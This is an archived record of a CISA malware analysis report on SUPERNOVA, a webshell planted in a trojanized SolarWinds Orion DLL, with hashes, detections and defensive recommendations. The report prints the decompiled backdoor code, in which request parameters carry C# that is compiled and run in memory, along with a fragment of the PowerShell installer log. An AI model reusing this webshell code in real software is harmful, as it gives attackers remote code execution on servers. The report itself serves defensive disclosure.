{
	"id": "21323452-651a-41c6-9e6b-1dd6d025bd24",
	"created_at": "2026-04-06T00:07:27.175609Z",
	"updated_at": "2026-04-10T13:12:54.256292Z",
	"deleted_at": null,
	"sha1_hash": "35fb57187300d1a84ace0873f609ff825055e72a",
	"title": "MAR-10319053-1.v2 - Supernova | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 76525,
	"plain_text": "MAR-10319053-1.v2 - Supernova | CISA\r\nPublished: 2021-11-17 · Archived: 2026-04-05 12:54:44 UTC\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial\r\nproduct or service referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Protocol (TLP), see http://www.cisa.gov/tlp.\r\nSummary\r\nDescription\r\nThis report provides detailed analysis of several malicious artifacts, affecting the SolarWinds Orion product, which have\r\nbeen identified by the security company FireEye as SUPERNOVA. According to a SolarWinds advisory, SUPERNOVA is\r\nnot embedded within the Orion platform as a supply chain attack; rather, it is placed by an attacker directly on a system that\r\nhosts SolarWinds Orion and is designed to appear as part of the SolarWinds product. CISA's assessment is that\r\nSUPERNOVA is not part of the SolarWinds supply chain attack described in Alert AA20-352A. See the section in\r\nMicrosoft’s blog titled “Additional malware discovered” for more information.\r\nThis report describes the analysis of a PowerShell script that decodes and installs SUPERNOVA, a malicious webshell\r\nbackdoor. SUPERNOVA is embedded in a trojanized version of the SolarWinds Orion Web Application module called\r\n“App_Web_logoimagehandler.ashx.b6031896.dll.\" The SUPERNOVA malware allows a remote operator to dynamically\r\ninject C# source code into a web portal provided via the SolarWinds software suite. 
The injected code is compiled and\r\ndirectly executed in memory.\r\nFor a downloadable copy of indicators of compromise (IOCs), see: MAR-10319053-1.v2.stix\r\nReferences\r\nhttps://us-cert.cisa.gov/ncas/alerts/aa20-352a\r\nhttps://www.solarwinds.com/securityadvisory#anchor2\r\nhttps://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/\r\nSubmitted Files (2)\r\n290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515 (1.ps1)\r\nc15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71 (App_Web_logoimagehandler.ashx....)\r\nFindings\r\n290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515\r\nTags\r\ntrojan\r\nDetails\r\nName 1.ps1\r\nSize 10609 bytes\r\nType ASCII text, with very long lines\r\nMD5 4423a4353a0e7972090413deb40d56ad\r\nSHA1 8004d78e6934efb4dea8baf48a589c2c1ed10bf3\r\nSHA256 290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515\r\nSHA512 5d2dee3c8e4c6a4fa1d84e434ab0b864245fae51360e03ed7338c2b40d7c1d61aad755f8c54615197100dd3b8bfd00d33b256178123002b7c07\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a\r\nPage 1 of 6\n\nssdeep 192:9x2OrPgH8XWECNsW4IX4SLY0tqIeZ9StIGca/HjKxnlyImIwN:Fr28XWECNsbIX4SLY0BeZ9StI9OHjMlw\r\nEntropy 4.457683\r\nAntivirus\r\nMicrosoft Security Essentials Trojan:MSIL/Solorigate.G!dha\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\n290951fcc7... Contains c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71\r\nDescription\r\nThis file is an event log that details the execution of a PowerShell script designed to Base64 decode and install a 32-bit .NET\r\ndynamic-link library (DLL) into the following location:\r\n\"C:\\inetpub\\SolarWinds\\bin\\App_Web_logoimagehandler.ashx.b6031896.dll\r\n(c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71). 
The DLL is patched with the SUPERNOVA\r\nwebshell and is a replacement for a legitimate SolarWinds DLL.\r\nDisplayed below is a portion of the event log with the victim information redacted. It indicates the malicious PowerShell\r\nwas executed by the legitimate SolarWinds application \"E:\\Program Files\r\n(x86)\\SolarWinds\\Orion\\SolarWinds.BusinessLayerHost.exe.\"\r\n--Begin event log--\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n[Convert]::FromBase64String($b);[IO.File]::WriteAllBytes($f $bs)' 'S-1-0-0' '-' '-' '0x0000000000000000' 'E:\\Program Files\r\n(x86)\\SolarWinds\\Orion\\SolarWinds.BusinessLayerHost.exe' 'S-1-16-16384'] Computer Name: [redacted].[redacted].net\r\nRecord Number: 12551353 Event Level: 0\r\n--End event log--\r\nc15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71\r\nTags\r\nbackdoortrojan\r\nDetails\r\nName App_Web_logoimagehandler.ashx.b6031896.dll\r\nSize 7680 bytes\r\nType PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows\r\nMD5 56ceb6d0011d87b6e4d7023d7ef85676\r\nSHA1 75af292f34789a1c782ea36c7127bf6106f595e8\r\nSHA256 c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71\r\nSHA512 f7eac6ab99fe45ca46417cdca36ba27560d5f8a2f37f378ba97636662595d55fa34f749716971aa96a862e37e0199eb6cb905636e6ab0123cfa08\r\nssdeep 192:8/SqRzbt0GBDawA5uT8wSlyDDGTBNFkQ:8/SyHKGBDax5uThDD6BNr\r\nEntropy 4.622450\r\nAntivirus\r\nAhnlab Backdoor/Win32.SunBurst\r\nAntiy Trojan/MSIL.Agent\r\nAvira TR/Sunburst.BR\r\nBitDefender Trojan.Supernova.A\r\nClamav Win.Countermeasure.SUPERNOVA-9808999-1\r\nComodo Backdoor\r\nCyren W32/Supernova.GYFL-6114\r\nESET a variant of MSIL/SunBurst.A trojan\r\nEmsisoft Trojan.Supernova.A (B)\r\nIkarus Backdoor.Sunburst\r\nK7 Trojan ( 00574a531 )\r\nLavasoft Trojan.Supernova.A\r\nMcAfee Trojan-sunburst\r\nMicrosoft Security Essentials 
Trojan:MSIL/Solorigate.G!dha\r\nNANOAV Trojan.Win32.Sunburst.iduxaq\r\nQuick Heal Backdoor.Sunburst\r\nSophos Mal/Sunburst-B\r\nSymantec Backdoor.SuperNova\r\nSystweak trojan-backdoor.sunburst-r\r\nTrendMicro Trojan.59AF4B5F\r\nTrendMicro House Call Trojan.59AF4B5F\r\nVirusBlokAda TScope.Trojan.MSIL\r\nZillya! Trojan.SunBurst.Win32.3\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\n100 5976f9a3f7dcd2c124f1664003a1bb607bc22abc2c95abe5ecd645a5dbfe2c6c\r\nPE Metadata\r\nCompile Date 2020-03-24 05:16:10-04:00\r\nImport Hash dae02f32a21e03ce65412f6e56942daa\r\nCompany Name None\r\nFile Description  \r\nInternal Name App_Web_logoimagehandler.ashx.b6031896.dll\r\nLegal Copyright  \r\nOriginal Filename App_Web_logoimagehandler.ashx.b6031896.dll\r\nProduct Name None\r\nProduct Version 0.0.0.0\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n21556dbcb227ba907e33b0847b427ef4 header 512 2.597488\r\n9002a963c87901397a986c3333d09627 .text 5632 5.285309\r\n78888431b10a2bf283387437a750bca3 .rsrc 1024 2.583328\r\n45ded0a8dacde15cb402adfe11b0fe3e .reloc 512 0.081539\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C# / Basic .NET\r\nRelationships\r\nc15abaf51e... Contained_Within 290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515\r\nDescription\r\nThis file is a 32-bit .NET DLL that has been identified as a modified SolarWinds plug-in. The malware patched into this\r\nplug-in has been identified as SUPERNOVA. The modification includes the \"DynamicRun\" export function which is\r\ndesigned to accept and parse provided arguments. The arguments are expected to partially contain C# code, which the\r\nfunction will compile and execute directly in system memory. 
The purpose of this malware indicates the attacker has\r\nidentified a vulnerability allowing the ability to dynamically provide a custom \"HttpContext\" data structure to the web\r\napplication’s \"ProcessRequest\" function.\r\nThe ProcessRequest function takes an HttpContext Data structure as an argument. It parses portions of the request\r\nsubstructure of the parent HttpContext data structure using the keys “codes”, “clazz”, “method”, and “args”. The parsed data\r\nis placed in the respective variables codes, clazz, method, and args. These four variables are then provided as arguments to\r\nthe DynamicRun function described next.\r\nThe \"DynamicRun\" function is designed to accept C# code and then dynamically compile and execute it. The \"codes\"\r\nvariable provided to the function contains the actual C# code. The \"clazz\" variable provides the class name that is used when\r\ncompiling the source code. The \"method\" variable will contain the function name that will be called for the newly compiled\r\nclass. 
The \"args\" variable will contain the arguments provided to the executed malicious class.\r\nAfter parsing out and executing the provided code, the \"ProcessRequest\" function will continue on to call a function named\r\n\"WebSettingsDAL.get_NewNOCSiteLogo.\" Analysis indicates this is a valid SolarWinds function designed to render the\r\nproduct logo on a web application.\r\n--Begin ProcessRequest Function--\r\npublic void ProcessRequest(HttpContext context)\r\n{\r\n   try\r\n   {\r\n    string codes = context.Request[\"codes\"];\r\n    string clazz = context.Request[\"clazz\"];\r\n    string method = context.Request[\"method\"];\r\n    string[] args = context.Request[\"args\"].Split('\\n');\r\n    context.Response.ContentType = \"text/plain\";\r\n    context.Response.Write(this.DynamicRun(codes, clazz, method, args));\r\n   }\r\n   catch (Exception ex)\r\n   {\r\n   }\r\n   NameValueCollection queryString = HttpUtility.ParseQueryString(context.Request.Url.Query);\r\n   try\r\n   {\r\n    string str1 = queryString[\"id\"];\r\n    string s;\r\n    if (!(str1 == \"SitelogoImage\"))\r\n    {\r\n       if (!(str1 == \"SiteNoclogoImage\"))\r\n        throw new ArgumentOutOfRangeException(queryString[\"id\"]);\r\n       s = WebSettingsDAL.get_NewNOCSiteLogo();\r\n    }\r\n    else\r\n       s = WebSettingsDAL.get_NewSiteLogo();\r\n    byte[] buffer = Convert.FromBase64String(s);\r\n    if ((buffer == null || buffer.Length == 0) \u0026\u0026\r\nFile.Exists(HttpContext.Current.Server.MapPath(\"//NetPerfMon//images//NoLogo.gif\")))\r\n       buffer = File.ReadAllBytes(HttpContext.Current.Server.MapPath(\"//NetPerfMon//images//NoLogo.gif\"));\r\n    string str2 = buffer.Length \u003c 2 || buffer[0] != byte.MaxValue || buffer[1] != (byte) 216 ? (buffer.Length \u003c 3 || buffer[0] !=\r\n(byte) 71 || (buffer[1] != (byte) 73 || buffer[2] != (byte) 70) ? 
(buffer.Length \u003c 8 || buffer[0] != (byte) 137 || (buffer[1] !=\r\n(byte) 80 || buffer[2] != (byte) 78) || (buffer[3] != (byte) 71 || buffer[4] != (byte) 13 || (buffer[5] != (byte) 10 || buffer[6] !=\r\n(byte) 26)) || buffer[7] != (byte) 10 ? \"image/jpeg\" : \"image/png\") : \"image/gif\") : \"image/jpeg\";\r\n    context.Response.OutputStream.Write(buffer, 0, buffer.Length);\r\n    context.Response.ContentType = str2;\r\n    context.Response.Cache.SetCacheability(HttpCacheability.Private);\r\n    context.Response.StatusDescription = \"OK\";\r\n    context.Response.StatusCode = 200;\r\n    return;\r\n   }\r\n   catch (Exception ex)\r\n   {\r\n    LogoImageHandler._log.Error((object) \"Unexpected error trying to provide logo image for the page.\", ex);\r\n   }\r\n   context.Response.Cache.SetCacheability(HttpCacheability.NoCache);\r\n   context.Response.StatusDescription = \"NO IMAGE\";\r\n   context.Response.StatusCode = 500;\r\n}\r\n--End ProcessRequest Function--\r\n--Begin DynamicRun Function--\r\npublic string DynamicRun(string codes, string clazz, string method, string[] args)\r\n{\r\n   ICodeCompiler compiler = new CSharpCodeProvider().CreateCompiler();\r\n   CompilerParameters options = new CompilerParameters();\r\n   options.ReferencedAssemblies.Add(\"System.dll\");\r\n   options.ReferencedAssemblies.Add(\"System.ServiceModel.dll\");\r\n   options.ReferencedAssemblies.Add(\"System.Data.dll\");\r\n   options.ReferencedAssemblies.Add(\"System.Runtime.dll\");\r\n   options.GenerateExecutable = false;\r\n   options.GenerateInMemory = true;\r\n   string source = codes;\r\n   CompilerResults compilerResults = compiler.CompileAssemblyFromSource(options, source);\r\n   if (compilerResults.Errors.HasErrors)\r\n   {\r\n    // ISSUE: reference to a compiler-generated field\r\n    // ISSUE: reference to a compiler-generated field\r\n    // ISSUE: reference to a compiler-generated field\r\n    // ISSUE: method pointer\r\n    string.Join(Environment.NewLine, 
(IEnumerable\u003cstring\u003e) Enumerable.Select\u003cCompilerError, string\u003e\r\n((IEnumerable\u003cM0\u003e) compilerResults.Errors.Cast\u003cCompilerError\u003e(), (Func\u003cM0, M1\u003e)\r\n(LogoImageHandler.\\u003C\\u003Ec.\\u003C\\u003E9__3_0 ?? (LogoImageHandler.\\u003C\\u003Ec.\\u003C\\u003E9__3_0 =\r\nnew Func\u003cCompilerError, string\u003e((object) LogoImageHandler.\\u003C\\u003Ec.\\u003C\\u003E9,\r\n__methodptr(\\u003CDynamicRun\\u003Eb__3_0))))));\r\n    Console.WriteLine(\"error\");\r\n    return compilerResults.Errors.ToString();\r\n   }\r\n   object instance = compilerResults.CompiledAssembly.CreateInstance(clazz);\r\n   return (string) instance.GetType().GetMethod(method).Invoke(instance, (object[]) args);\r\n}\r\n--End DynamicRun Function--\r\nScreenshots\r\nFigure 1 -\r\nRelationship Summary\r\n290951fcc7... Contains c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71\r\nc15abaf51e... Contained_Within 290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515\r\nRecommendations\r\nCISA recommends that users and administrators consider using the following best practices to strengthen the security\r\nposture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators\r\nprior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. If these services are required, use strong passwords or Active Directory\r\nauthentication.\r\nRestrict users' ability (permissions) to install and run unwanted software applications. 
Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nMaintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\r\nAdditional information on malware incident prevention and handling can be found in National Institute of Standards and\r\nTechnology (NIST) Special Publication 800-83, \"Guide to Malware Incident Prevention \u0026 Handling for Desktops and\r\nLaptops\".\r\nContact Information\r\nDocument FAQ\r\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances this report will provide initial indicators for computer and network defense. To request\r\nadditional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide\r\ninformation regarding the level of desired analysis.\r\nCan I edit this document? 
This document is not to be edited in any way by recipients. All comments or questions related to\r\nthis document should be directed to the CISA at 1-844-Say-CISA or SayCISA@cisa.dhs.gov.\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software\r\nvulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.\r\nJanuary 27, 2021: Initial Version|November 17, 2021: Removed a file that was determined to be a legitimate SolarWinds file\r\nSource: https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a"
	],
	"report_names": [
		"ar21-027a"
	],
	"threat_actors": [],
	"ts_created_at": 1775434047,
	"ts_updated_at": 1775826774,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/35fb57187300d1a84ace0873f609ff825055e72a.pdf",
		"text": "https://archive.orkl.eu/35fb57187300d1a84ace0873f609ff825055e72a.txt",
		"img": "https://archive.orkl.eu/35fb57187300d1a84ace0873f609ff825055e72a.jpg"
	}
}